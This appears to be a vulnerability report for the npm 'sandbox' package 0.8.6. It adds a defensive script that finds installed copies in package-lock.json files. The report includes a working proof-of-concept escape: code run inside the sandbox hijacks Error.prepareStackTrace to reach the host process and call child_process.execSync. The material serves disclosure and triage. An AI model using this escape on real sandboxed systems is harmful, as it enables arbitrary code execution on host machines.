Open
Description
- Sandbox version: 0.8.6
- Node version: 18.15.0
```js
var Sandbox = require("sandbox")

// Code handed to the sandbox: the prepareStackTrace hook receives host call-site objects
var code = `
Error.prepareStackTrace = (_, c) => c[0].getThis();
const ret = Error().stack;
ret.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
`
var s = new Sandbox()
s.run(code)
```
Affected versions of this package are vulnerable to remote code execution. In particular, the attacker is able to access host error objects during the generation of a stack trace, which can lead to execution of arbitrary code on the host machine.
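For triage, an added example (not part of the original report or of the sandbox project): it lists every installed copy of the `sandbox` package in a parsed `package-lock.json`, including nested copies, and marks the 0.8.6 version named in the report. The function name and both lockfile objects are constructed for illustration.

```javascript
// Added example: locate installed copies of "sandbox" in a parsed package-lock.json.
const REPORTED_VERSION = "0.8.6"; // the version named in the report

// findSandboxInstalls is a hypothetical helper name, not an npm or sandbox API.
function findSandboxInstalls(lock, name = "sandbox") {
  const hits = [];
  // Lockfile v2/v3: flat "packages" map keyed by install path.
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    const direct = path === `node_modules/${name}`;
    const nested = path.endsWith(`/node_modules/${name}`);
    if (direct || nested) hits.push({ path, version: meta.version });
  }
  // Lockfile v1: nested "dependencies" tree. Skipped when "packages" exists,
  // because v2 lockfiles carry both and would yield duplicates.
  if (!lock.packages) {
    const walk = (deps, prefix) => {
      for (const [dep, meta] of Object.entries(deps || {})) {
        const path = `${prefix}node_modules/${dep}`;
        if (dep === name) hits.push({ path, version: meta.version });
        walk(meta.dependencies, `${path}/`);
      }
    };
    walk(lock.dependencies, "");
  }
  // Every copy needs review; "reported" marks the exact version from the report.
  return hits.map((h) => ({ ...h, reported: h.version === REPORTED_VERSION }));
}

// Constructed sample lockfiles (not taken from any real project).
const sampleV3 = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/sandbox": { version: "0.8.6" },
    "node_modules/@acme/sandbox": { version: "2.0.0" }, // scoped name, must not match
    "node_modules/runner/node_modules/sandbox": { version: "0.0.1" },
  },
};
const sampleV1 = {
  lockfileVersion: 1,
  dependencies: {
    runner: { version: "1.2.0", dependencies: { sandbox: { version: "0.8.6" } } },
  },
};

console.log(findSandboxInstalls(sampleV3));
console.log(findSandboxInstalls(sampleV1));
```

To check a real project, pass `JSON.parse(fs.readFileSync("package-lock.json", "utf8"))` to the function.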